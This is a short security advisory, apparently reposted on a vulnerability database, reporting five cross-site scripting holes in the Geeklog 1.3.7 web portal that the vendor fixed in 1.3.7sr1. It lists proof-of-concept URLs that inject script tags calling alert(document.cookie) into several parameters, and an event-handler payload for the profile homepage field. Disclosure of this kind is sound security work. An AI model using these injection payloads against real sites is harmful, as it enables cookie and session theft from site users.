Multiple XSS in Geeklog 1.3.7

2007.10.15
Credit: snooq
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

nothing new. typical XSS bugs. summary ======= Geeklog is a web portal system written in PHP. There exists 5 XSS holes in the software. the 'holes' =========== --1-- http://vulnerable.host/profiles.php?uid=<script>alert(document.coo kie)</script> --2-- http://vulnerable.host/users.php?mode=profile&uid=<script>alert(do cument.cookie)</script> --3-- http://vulnerable.host//comment.php?mode=Delete&sid=1&cid=<script> alert(document.cookie)</script> --4-- http://vulnerable.host//profiles.php?what=contact&author=ich&authoremail =bla%40bla.com&subject=hello&message=text&uid=<script>alert(docume nt.cookie)</script> --5-- 'homepage' field in the user's account information page is not sanitised properly. As a result, javascript can be injected by setting the 'homepage' field like this: http://url" onmouseover="alert(document.cookie) ** 3) & 4) were found by Dirk Haun of Geeklog Team. vendor status ============= 03/01/2003 contacted Dirk Haun of Geeklog team 14/01/2003 Geeklog 1.3.7sr1 was released. New version closes all holes found. --==snooq==--


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top